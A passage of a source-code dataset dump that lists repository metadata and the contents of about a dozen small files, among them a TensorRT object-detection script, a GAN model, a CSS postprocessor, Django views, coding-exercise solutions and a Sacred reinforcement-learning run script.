blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e1881ded3dce36b78149971eeb52f0be86908022
|
b62599ac4093da825708638a4a25f252a83e9f37
|
/object_detection/object_detection_rt.py
|
d2a4c5443ef1178afc36c91e7053405948f18f7b
|
[] |
no_license
|
raspberry-pi-maker/NVIDIA-Jetson
|
25ca2033d36aa8c6f837ed2a8c49281d646be29b
|
30a5596aa0d9a6a960f2fef4d084eb42a94a2b66
|
refs/heads/master
| 2023-06-23T04:17:15.675476 | 2023-06-10T02:23:33 | 2023-06-10T02:23:33 | 211,216,972 | 40 | 30 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,250 |
py
|
import argparse
import numpy as np
import os
import six.moves.urllib as urllib
import sys
import time
import tarfile
import tensorflow.contrib.tensorrt as trt
import tensorflow as tf
import zipfile
from distutils.version import StrictVersion
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from object_detection.utils import ops as utils_ops
if StrictVersion(tf.__version__) < StrictVersion('1.12.0'):
raise ImportError('Please upgrade your TensorFlow installation to v1.12.*.')
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
tf_sess = None
graph_def = None
parser = argparse.ArgumentParser(description='object_detection using tensorRT')
parser.add_argument('--trtmodel', type=str, required=True, help='target tensorRT optimized model path')
parser.add_argument('--image', type=str, required=True, help='inference image file path')
args = parser.parse_args()
PATH_TO_LABELS = './object_detection/data/mscoco_label_map.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(PATH_TO_LABELS, use_display_name=True)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
def load_graph():
gf = tf.GraphDef()
with tf.gfile.GFile(args.trtmodel, 'rb') as fid:
gf.ParseFromString(fid.read())
return gf
def make_session(graph_def):
global tf_sess
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
#tf_sess = tf.Session(config=tf_config, graph = graph_def)
tf_sess = tf.Session(config=tf_config)
tf.import_graph_def(graph_def, name='')
def run_inference_for_single_image2(image):
global tf_sess
tf_input = tf_sess.graph.get_tensor_by_name('image_tensor' + ':0')
tensor_dict = {}
ops = tf.get_default_graph().get_operations()
all_tensor_names = {output.name for op in ops for output in op.outputs}
#for key in [ 'num_detections', 'detection_boxes', 'detection_scores', 'detection_classes', 'detection_masks' ]:
for key in [ 'num_detections', 'detection_boxes', 'detection_scores', 'detection_classes']:
tensor_name = key + ':0'
if tensor_name in all_tensor_names:
tensor_dict[key] = tf.get_default_graph().get_tensor_by_name(tensor_name)
t = time.time()
output_dict = tf_sess.run(tensor_dict, feed_dict={tf_input: image})
elapsed = time.time() - t
output_dict['num_detections'] = int(output_dict['num_detections'][0])
output_dict['detection_classes'] = output_dict[ 'detection_classes'][0].astype(np.int64)
output_dict['detection_boxes'] = output_dict['detection_boxes'][0]
output_dict['detection_scores'] = output_dict['detection_scores'][0]
return output_dict, elapsed
graph_def = load_graph()
make_session(graph_def)
print('===== Image open:%s ====='%(args.image))
im = Image.open(args.image)
width, height = im.size
#image = im.resize((int(width / 2), int(height / 2)))
image = im.copy()
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
# Actual detection.
#output_dict, elapsed = run_inference_for_single_image(image_np_expanded, graph_def)
output_dict, elapsed = run_inference_for_single_image2(image_np_expanded)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
fig = plt.figure(figsize=IMAGE_SIZE)
txt = 'FPS:%f'%(1.0 / elapsed)
plt.text(10, 10, txt, fontsize=12)
plt.imshow(image_np)
name = os.path.splitext(args.image)[0]
name = name + '_result_rt.png'
plt.savefig(name)
|
[
"[email protected]"
] | |
0c3f52b0dcd6a2a978142a858d3fed4a8d00e023
|
a0cde41c20d4ffdcc1ace0e217e3338f1cd93cde
|
/src/batchDefinition/slanTour/batchDefSTWeightedAVG.py
|
2ec97b0b75915ffa295f2489348f02040b01fc35
|
[] |
no_license
|
sbalcar/HeterRecomPortfolio
|
ea15a3277774d1b37d69b527406e5a8558cc3cbf
|
a8714902a1f45b5e9bfe0f9af40cce87e36c7471
|
refs/heads/master
| 2022-05-30T00:59:36.693858 | 2022-04-09T16:12:34 | 2022-04-09T16:12:34 | 219,495,240 | 1 | 3 | null | 2021-01-17T12:44:59 | 2019-11-04T12:21:41 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 3,061 |
py
|
#!/usr/bin/python3
import os
from typing import List
from typing import Dict #class
from pandas.core.frame import DataFrame #class
from portfolioDescription.portfolio1AggrDescription import Portfolio1AggrDescription #class
from evaluationTool.aEvalTool import AEvalTool #class
from evaluationTool.evalToolDHondt import EvalToolDHondt #class
from aggregationDescription.aggregationDescription import AggregationDescription #class
from batchDefinition.inputAggrDefinition import InputAggrDefinition # class
from batchDefinition.inputRecomSTDefinition import InputRecomSTDefinition #class
from aggregation.operators.aDHondtSelector import ADHondtSelector #class
from aggregation.operators.rouletteWheelSelector import RouletteWheelSelector #class
from aggregation.operators.theMostVotedItemSelector import TheMostVotedItemSelector #class
from batchDefinition.inputABatchDefinition import InputABatchDefinition
from batchDefinition.aBatchDefinitionST import ABatchDefinitionST #class
from batchDefinition.ml1m.batchDefMLWeightedAVG import BatchDefMLWeightedAVG #class
from batchDefinition.inputSimulatorDefinition import InputSimulatorDefinition #class
from simulator.simulator import Simulator #class
from history.historyHierDF import HistoryHierDF #class
from batchDefinition.ml1m.batchDefMLFuzzyDHondt import BatchDefMLFuzzyDHondt #class
from portfolioModel.pModelBandit import PModelBandit #class
from portfolioModel.pModelDHondtBanditsVotes import PModelDHondtBanditsVotes #class
from portfolioModel.pModelDHondt import PModelDHondt #class
class BatchDefSTWeightedAVG(ABatchDefinitionST):
def getBatchName(self):
return "WAVG"
def getParameters(self):
batchDefMLWeightedAVG = BatchDefMLWeightedAVG()
batchDefMLWeightedAVG.lrClicks: List[float] = [0.03]
batchDefMLWeightedAVG.lrViewDivisors: List[float] = [250]
return batchDefMLWeightedAVG.getParameters()
def run(self, batchID:str, jobID:str):
divisionDatasetPercentualSize:int
uBehaviour:str
repetition:int
divisionDatasetPercentualSize, uBehaviour, repetition = InputABatchDefinition().getBatchParameters(self.datasetID)[batchID]
eTool:AEvalTool = self.getParameters()[jobID]
rIDs, rDescs = InputRecomSTDefinition.exportPairOfRecomIdsAndRecomDescrs()
aDescWeightedAVG:AggregationDescription = InputAggrDefinition.exportADescWeightedAVG()
pDescr:Portfolio1AggrDescription = Portfolio1AggrDescription(
self.getBatchName() + jobID, rIDs, rDescs, aDescWeightedAVG)
model:DataFrame = PModelDHondt(pDescr.getRecommendersIDs())
simulator:Simulator = InputSimulatorDefinition().exportSimulatorSlantour(
batchID, divisionDatasetPercentualSize, uBehaviour, repetition)
simulator.simulate([pDescr], [model], [eTool], [HistoryHierDF(pDescr.getPortfolioID())])
if __name__ == "__main__":
os.chdir("..")
os.chdir("..")
print(os.getcwd())
BatchDefSTWeightedAVG.generateAllBatches(InputABatchDefinition())
|
[
"[email protected]"
] | |
e89063f004ef56318689c8df2ebf442192e2aa44
|
a39e95a0536d312311531a49dec90bcc8f7ab0c5
|
/Lesson6_FunctionCompileRE/main.py
|
46adef70714ec420ee43ff944b6b4cdcde1257cb
|
[] |
no_license
|
Hadirback/python_part2
|
095010ca4866a4b6c9e5ca092602b43edbd344e8
|
a4b00aeb30f88df55751d5f23e570c33face113d
|
refs/heads/master
| 2020-08-11T09:13:03.793607 | 2019-11-04T23:10:45 | 2019-11-04T23:10:45 | 214,536,159 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,406 |
py
|
# compile
# re compile - если нужно найти и изменить что то подходящее под
# шаблон в нескольких переменных
import re
text1 = """
Сбо́рная Франции по футбо́лу 34-я минута представляет Францию в международных
матчах и турнирах по футболу. """
text2 = """
Управляющая организация 56-й номер — Федерация футбола Франции.
"""
text3 = """
Федерация является членом ФИФА с 1904 года, членом УЕФА с 1954
года. Французы 1-й час были одними из основателей обеих этих организаций.
"""
# вытаскиваем из всех текстов минуты
pattern_string = "\d{1,2}\-[йя]"
print(re.findall(pattern_string, text1))
print(re.findall(pattern_string, text2))
print(re.findall(pattern_string, text3))
# pattern_string постоянно преобразуется к паттерну что
# достаточно трудоемкая задача
pattern = re.compile("\d{1,2}\-[йя]")
print(type(pattern))
print(pattern.findall(text2))
print(pattern.findall(text1))
print(pattern.findall(text3))
print(re.sub(pattern, "n", text3))
# compile выполняется быстрее
|
[
"[email protected]"
] | |
d0937d391db976cdd9ce380dfda1333e8c5e6cfd
|
6ffc398b4a27c339f24938e8a0b9c565e33539ce
|
/site-packages-27/fpdf/__init__.py
|
e1f6d0ec86f11b94c27e9cf80fc511a1e065dabb
|
[] |
no_license
|
zwlyn/awesome-pdf
|
8f4483d717130a54545f2ba8b05313da99103039
|
8223929db5433c7b4ed61bceb4f5808c12e1ad85
|
refs/heads/master
| 2023-01-24T23:52:35.415117 | 2020-04-05T12:05:31 | 2020-04-05T12:05:31 | 253,162,782 | 2 | 0 | null | 2023-01-05T10:50:08 | 2020-04-05T05:31:20 |
Python
|
UTF-8
|
Python
| false | false | 415 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"FPDF for python"
__license__ = "LGPL 3.0"
__version__ = "1.7.9"
from .fpdf import FPDF, FPDF_FONT_DIR, FPDF_VERSION, SYSTEM_TTFONTS, set_global, FPDF_CACHE_MODE, FPDF_CACHE_DIR
try:
from .html import HTMLMixin
except ImportError:
import warnings
warnings.warn("web2py gluon package not installed, required for html2pdf")
from .template import Template
|
[
"[email protected]"
] | |
90fc9a11b36c7ec3937a286038d3b1c0a4812f9d
|
3529ecaa44a53172094ba13498097057c8972723
|
/Questiondir/520.detect-capital/520.detect-capital_93512141.py
|
4b4f3fe2c57d6a464255034820308ab06b71b8df
|
[] |
no_license
|
cczhong11/Leetcode-contest-code-downloader
|
0681f0f8c9e8edd5371fd8d0a1d37dcc368566b6
|
db64a67869aae4f0e55e78b65a7e04f5bc2e671c
|
refs/heads/master
| 2021-09-07T15:36:38.892742 | 2018-02-25T04:15:17 | 2018-02-25T04:15:17 | 118,612,867 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 376 |
py
|
class Solution(object):
def detectCapitalUse(self, word):
"""
:type word: str
:rtype: bool
"""
if word == word.upper():
return True
if word == word.lower():
return True
if (word[:1] == word[:1].upper()) and (word[1:] == word[1:].lower()):
return True
return False
|
[
"[email protected]"
] | |
8fe3e72a4fe1168fd5eb38c66f4f4aa526bd5ad0
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/125_algorithms/_exercises/templates/100_Python_Exercises_Evaluate_and_Improve_Your_Skills/Exercise 12 - More Ranges NUKE.py
|
7bb9127b558afdf2d3b6aa97628abdcdb2897719
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 163 |
py
|
#Create a script that generates a list whose items are products of the original list items multiplied by 10
my_range r..(1, 21)
print([10 * x ___ x __ my_range])
|
[
"[email protected]"
] | |
788ed2e5916d24970d79524c60e182a03ad4ecfb
|
a884039e1a8b0ab516b80c2186e0e3bad28d5147
|
/Livros/Introdução à Programação - 500 Algoritmos resolvidos/Capitulo 2/Exercicios 2a/Algoritmo36_lea9.py
|
a368507b3389f066630181aa6ff943bc3796ea6c
|
[
"MIT"
] |
permissive
|
ramonvaleriano/python-
|
6e744e8bcd58d07f05cd31d42a5092e58091e9f0
|
ada70918e945e8f2d3b59555e9ccc35cf0178dbd
|
refs/heads/main
| 2023-04-10T14:04:24.497256 | 2021-04-22T18:49:11 | 2021-04-22T18:49:11 | 340,360,400 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 273 |
py
|
# Program: Algoritmo36_lea9.py
# Author: Ramon R. Valeriano
# Description:
# Developed: 14/03/2020 - 19:55
# Updated:
number1 = int(input("Enter with firs number: "))
number2 = int(input("Enter with second number: "))
sum_ = number1 + number2
print("The sum: %d" %sum_)
|
[
"[email protected]"
] | |
05be3c6193f89bc5f3be46293ad8f4dda8d7aff8
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/CodeRecords/2551/60771/296110.py
|
9c1d23a5339719691c0cae541b95c62c95ea2fb3
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 408 |
py
|
#15
ori = input().split(" ")
N = int(ori[0])
M = int(ori[1])
lights = [False]*N
for i in range(0,M):
ori = input().split(" ")
a = int(ori[1])
b = int(ori[2])
if ori[0] == "0":
for j in range(a-1,b):
lights[j] = not lights[j]
if ori[0] == "1":
res = 0
for j in range(a-1,b):
if lights[j] == True:
res += 1
print(res)
|
[
"[email protected]"
] | |
1f5efb06eab8edbd3e09147a821a534f8f2d7483
|
1154fa5ae6fe517151e41f5f4746d1bada23e1a5
|
/scenes/cup_generator/model.py
|
7e8f6d5861759736d796c1fb6a1e135ab6258a3d
|
[] |
no_license
|
joaomonteirof/SMART_COUSP_Reconstruction
|
9f7aac2eb08bc67f3d8b7e786ff66a5c1c9dadf4
|
79ea702d75875bec399721b04cdaecf4fc6a6a0e
|
refs/heads/master
| 2023-09-04T00:05:20.981615 | 2021-10-13T17:26:10 | 2021-10-13T17:26:10 | 106,738,046 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,485 |
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class Generator(torch.nn.Module):
def __init__(self, input_dim=128, num_filters=[1024, 512, 256, 128, 64, 32], output_dim=1):
super(Generator, self).__init__()
# Hidden layers
self.hidden_layer = torch.nn.Sequential()
for i in range(len(num_filters)):
# Deconvolutional layer
if i == 0:
deconv = nn.ConvTranspose2d(input_dim, num_filters[i], kernel_size=4, stride=1, padding=0)
else:
deconv = nn.ConvTranspose2d(num_filters[i - 1], num_filters[i], kernel_size=4, stride=2, padding=1)
deconv_name = 'deconv' + str(i + 1)
self.hidden_layer.add_module(deconv_name, deconv)
# Initializer
nn.init.normal_(deconv.weight, mean=0.0, std=0.02)
nn.init.constant_(deconv.bias, 0.0)
# Batch normalization
bn_name = 'bn' + str(i + 1)
self.hidden_layer.add_module(bn_name, torch.nn.BatchNorm2d(num_filters[i]))
# Activation
act_name = 'act' + str(i + 1)
self.hidden_layer.add_module(act_name, torch.nn.ReLU())
# Output layer
self.output_layer = torch.nn.Sequential()
# Deconvolutional layer
out = torch.nn.ConvTranspose2d(num_filters[i], output_dim, kernel_size=4, stride=2, padding=1)
self.output_layer.add_module('out', out)
# Initializer
nn.init.normal_(out.weight, mean=0.0, std=0.02)
nn.init.constant_(out.bias, 0.0)
# Activation
self.output_layer.add_module('act', torch.nn.Sigmoid())
def forward(self, x):
if x.dim()==2:
x = x.unsqueeze(-1).unsqueeze(-1)
elif not x.dim()==4:
print('WRONG INPUT DIMENSION!!')
exit(1)
h = self.hidden_layer(x)
out = self.output_layer(h)
return out
class Discriminator(torch.nn.Module):
def __init__(self, optimizer, lr, betas, input_dim=1, num_filters=[32, 64, 128, 256, 512, 1024], output_dim=1, batch_norm=False):
super(Discriminator, self).__init__()
self.projection = nn.Conv2d(input_dim, 1, kernel_size=8, stride=2, padding=3, bias=False)
with torch.no_grad():
self.projection.weight /= torch.norm(self.projection.weight.squeeze()).item()
# Hidden layers
self.hidden_layer = torch.nn.Sequential()
for i in range(len(num_filters)):
# Convolutional layer
if i == 0:
conv = nn.Conv2d(1, num_filters[i], kernel_size=4, stride=2, padding=1)
else:
conv = nn.Conv2d(num_filters[i - 1], num_filters[i], kernel_size=4, stride=2, padding=1)
conv_name = 'conv' + str(i + 1)
self.hidden_layer.add_module(conv_name, conv)
# Initializer
nn.init.normal_(conv.weight, mean=0.0, std=0.02)
nn.init.constant_(conv.bias, 0.0)
# Batch normalization
if i != 0 and batch_norm:
bn_name = 'bn' + str(i + 1)
self.hidden_layer.add_module(bn_name, torch.nn.BatchNorm2d(num_filters[i]))
# Activation
act_name = 'act' + str(i + 1)
self.hidden_layer.add_module(act_name, torch.nn.LeakyReLU(0.2))
# Output layer
self.output_layer = torch.nn.Sequential()
# Convolutional layer
out = nn.Conv2d(num_filters[i], output_dim, kernel_size=4, stride=1, padding=1)
self.output_layer.add_module('out', out)
# Initializer
nn.init.normal_(out.weight, mean=0.0, std=0.02)
nn.init.constant_(out.bias, 0.0)
# Activation
self.output_layer.add_module('act', nn.Sigmoid())
self.optimizer = optimizer(list(self.hidden_layer.parameters()) + list(self.output_layer.parameters()), lr=lr, betas=betas)
def forward(self, x):
x = self.projection(x)
h = self.hidden_layer(x)
out = self.output_layer(h)
return out.squeeze()
|
[
"[email protected]"
] | |
c12730826a6aa9d5f5d486adc9b4fbd73d3e312c
|
87b4518e55c0e465aba39d86e65ba56f56502198
|
/css/postprocess.py
|
787db97ecfb72ae1d5d3a86a4fc9aaf218d47c28
|
[
"MIT"
] |
permissive
|
Serkan-devel/m.css
|
302831008d8949a2fb7b91565621b47dd638e38f
|
3c0e3d7875bc9ab63c93322cc02cab62239804d7
|
refs/heads/master
| 2020-04-01T02:00:17.005772 | 2019-01-12T11:36:33 | 2019-01-12T11:36:33 | 152,761,732 | 0 | 0 |
MIT
| 2019-01-12T11:36:34 | 2018-10-12T14:20:51 |
Python
|
UTF-8
|
Python
| false | false | 7,550 |
py
|
#!/usr/bin/env python
#
# This file is part of m.css.
#
# Copyright © 2017, 2018, 2019 Vladimír Vondruš <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
import argparse
import re
import os
import sys
import_rx = re.compile("^@import url\\('(?P<file>[^']+)'\\);$")
opening_brace_rx = re.compile("^\\s*:root\s*{\\s*$")
closing_brace_rx = re.compile("^\\s*}\\s*$")
comment_rx = re.compile("^\\s*(/\\*.*\\*/)?\\s*$")
comment_start_rx = re.compile("^\\s*(/\\*.*)\\s*$")
comment_end_rx = re.compile("^\\s*(.*\\*/)\\s*$")
variable_declaration_rx = re.compile("^\\s*(?P<key>--[a-z-]+)\\s*:\\s*(?P<value>[^;]+)\\s*;\\s*(/\\*.*\\*/)?\\s*$")
variable_use_rx = re.compile("^(?P<before>.+)var\\((?P<key>--[a-z-]+)\\)(?P<after>.+)$")
def postprocess(files, process_imports, out_file):
directory = os.path.dirname(files[0])
if not out_file:
basename, ext = os.path.splitext(files[0])
out_file = basename + ".compiled" + ext
variables = {}
imported_files = []
def parse(f):
nonlocal variables, imported_files
not_just_variable_declarations = False
in_variable_declarations = False
in_comment = False
for line in f:
# In comment and the comment is not ending yet, ignore
if in_comment:
if comment_end_rx.match(line):
in_comment = False
continue
# Import statement: add the file to additionally processed files
# unless it's disabled
match = import_rx.match(line)
if match:
if process_imports:
imported_files += [match.group('file')]
continue
# Variable use, replace with actual value
# TODO: more variables on the same line?
match = variable_use_rx.match(line)
if match and match.group('key') in variables:
out.write(match.group('before'))
out.write(variables[match.group('key')])
# Strip the trailing comment, if there, to save some bytes
if match.group('after').endswith('*/'):
out.write(match.group('after')[:match.group('after').rindex('/*')].rstrip())
else:
out.write(match.group('after'))
out.write("\n")
continue
# Opening brace of variable declaration block
match = opening_brace_rx.match(line)
if match:
in_variable_declarations = True
continue
# Variable declaration
match = variable_declaration_rx.match(line)
if match and in_variable_declarations:
variables[match.group('key')] = match.group('value')
continue
# Comment or empty line, ignore
if comment_rx.match(line):
continue
# Comment start line, ignore this and the next lines
if comment_start_rx.match(line):
in_comment = True
continue
# Closing brace of variable declaration block. If it was not just
# variable declarations, put the closing brace to the output as
# well.
match = closing_brace_rx.match(line)
if match and in_variable_declarations:
if not_just_variable_declarations: out.write("}\n")
in_variable_declarations = False
continue
# If inside variable declaration block, include also the opening
# brace and remeber to put the closing brace there as well
if in_variable_declarations:
out.write(":root {\n")
not_just_variable_declarations = True
# Something else, copy verbatim to the output. Strip the trailing
# comment, if there, to save some bytes.
if line.rstrip().endswith('*/'):
out.write(line[:line.rindex('/*')].rstrip() + '\n')
else:
out.write(line)
with open(out_file, mode='w') as out:
# Put a helper comment and a license blob on top
out.write("""/* Generated using `./postprocess.py {}`. Do not edit. */
/*
This file is part of m.css.
Copyright © 2017, 2018, 2019 Vladimír Vondruš <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
*/
""".format(' '.join(sys.argv[1:])))
# Parse the top-level file
with open(files[0]) as f: parse(f)
# Now open the imported files and parse them as well. Not doing any
# recursive parsing.
for i, file in enumerate(imported_files + files[1:]):
if i: out.write('\n')
with open(file) as f: parse(f)
return 0
if __name__ == "__main__":
parser = argparse.ArgumentParser(description=r"""
Postprocessor for removing @import statements and variables from CSS files.
Combines all files into a new *.compiled.css file. The basename is taken
implicitly from the first argument. The -o option can override the output
filename.""")
parser.add_argument('files', nargs='+', help="input CSS file(s)")
parser.add_argument('--no-import', help="ignore @import statements", action='store_true')
parser.add_argument('-o', '--output', help="output file", default='')
args = parser.parse_args()
exit(postprocess(args.files, not args.no_import, args.output))
|
[
"[email protected]"
] | |
7c0bf7ade1f8db725a4ef41dc22305288b4582ce
|
2716d8e04c957aebc5137b3dbb719cbb31eaf013
|
/user_extent/users/models.py
|
74d53617f24544e6ce4de123d9e95b400466ebb0
|
[] |
no_license
|
anlaganlag/mini_proj_component
|
01d5fdd641cbc2a5199865d64b21431603704bd1
|
1def0fc576bb422b6819bd2df56b8e7cd48d3368
|
refs/heads/master
| 2021-01-06T23:54:13.921612 | 2020-02-20T10:28:55 | 2020-02-20T10:28:55 | 241,518,920 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 206 |
py
|
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class CustomUser(AbstractUser):
pass
def __str__(self):
return self.username
|
[
"[email protected]"
] | |
24364854b0efa09b1fd0ed72288c66064dfb1353
|
a2e3f4944076a9d25fd6e7aa30d0cda55c47ff18
|
/template_dynamicloader/views.py
|
2f66be35ba8cae440020eeac4d89c162fbdf329c
|
[] |
no_license
|
redatest/Shakal-NG
|
fb62b58b3d4c7a6a236beed8efd98712425621f2
|
d2a38df9910ec11b237912eefe1c1259203675ee
|
refs/heads/master
| 2021-01-18T02:21:44.654598 | 2015-03-21T14:09:56 | 2015-03-21T14:09:56 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 526 |
py
|
# -*- coding: utf-8 -*-
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from django.views.decorators.http import require_POST
from template_dynamicloader.forms import ChangeTemplateHiddenForm
from template_dynamicloader.utils import switch_template
@require_POST
def change(request):
form = ChangeTemplateHiddenForm(request.POST)
if form.is_valid() and 'change_style' in request.POST:
switch_template(request, **form.cleaned_data)
return HttpResponseRedirect(reverse('home'))
|
[
"[email protected]"
] | |
6a138ba973cb0c3445c9e304eb69802cea8a51f1
|
34b76d94ff323e65e76be9bef71379e73046ad1f
|
/sacred_runs_final/_sources/run_sacred_926b2f1738101acc8665dff2324ae499.py
|
44541df559402ca43e56054e8681d454cc6dacc7
|
[
"MIT"
] |
permissive
|
lorelupo/baselines
|
5324e3f05615789608e6119ae7395b77973cbe8c
|
8b6df664ecb714e77703f8fd9c7ea3841048bb28
|
refs/heads/master
| 2020-04-29T20:19:34.256241 | 2019-02-28T19:18:21 | 2019-02-28T19:18:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,135 |
py
|
#!/usr/bin/env python3
# noinspection PyUnresolvedReferences
'''
This script runs rllab or gym environments. To run RLLAB, use the format
rllab.<env_name> as env name, otherwise gym will be used.
export SACRED_RUNS_DIRECTORY to log sacred to a directory
export SACRED_SLACK_CONFIG to use a slack plugin
'''
# Common imports
import sys, re, os, time, logging
from collections import defaultdict
# Framework imports
import gym
import tensorflow as tf
# Self imports: utils
from baselines.common import set_global_seeds
from baselines import logger
import baselines.common.tf_util as U
from baselines.common.rllab_utils import Rllab2GymWrapper, rllab_env_from_name
from baselines.common.atari_wrappers import make_atari, wrap_deepmind
from baselines.common.parallel_sampler import ParallelSampler
from baselines.common.cmd_util import get_env_type
# Self imports: algorithm
from baselines.policy.mlp_policy import MlpPolicy
from baselines.policy.cnn_policy import CnnPolicy
from baselines.pois import pois
# Sacred
from sacred import Experiment
from sacred.observers import FileStorageObserver, SlackObserver
# Create experiment, assign the name if provided in env variables
if os.environ.get('EXPERIMENT_NAME') is not None:
ex = Experiment(os.environ.get('EXPERIMENT_NAME'))
else:
ex = Experiment('POIS')
# Set a File Observer
if os.environ.get('SACRED_RUNS_DIRECTORY') is not None:
print("Sacred logging at:", os.environ.get('SACRED_RUNS_DIRECTORY'))
ex.observers.append(FileStorageObserver.create(os.environ.get('SACRED_RUNS_DIRECTORY')))
if os.environ.get('SACRED_SLACK_CONFIG') is not None:
print("Sacred is using slack.")
ex.observers.append(SlackObserver.from_config(os.environ.get('SACRED_SLACK_CONFIG')))
@ex.config
def custom_config():
seed = 0
env = 'rllab.cartpole'
num_episodes = 100
max_iters = 500
horizon = 500
iw_method = 'is'
iw_norm = 'none'
natural = False
file_name = 'progress'
logdir = 'logs'
bound = 'max-d2'
delta = 0.99
njobs = -1
save_weights = False
policy = 'nn'
policy_init = 'xavier'
max_offline_iters = 10
gamma = 1.0
center = False
clipping = False
entropy = 'none'
reward_clustering = 'none'
positive_return = False
experiment_name = None
# ENTROPY can be of 4 schemes:
# - 'none': no entropy bonus
# - 'step:<height>:<duration>': step function which is <height> tall for <duration> iterations
# - 'lin:<max>:<min>': linearly decreasing function from <max> to <min> over all iterations, clipped to 0 for negatives
# - 'exp:<height>:<scale>': exponentially decreasing curve <height> tall, use <scale> to make it "spread" more
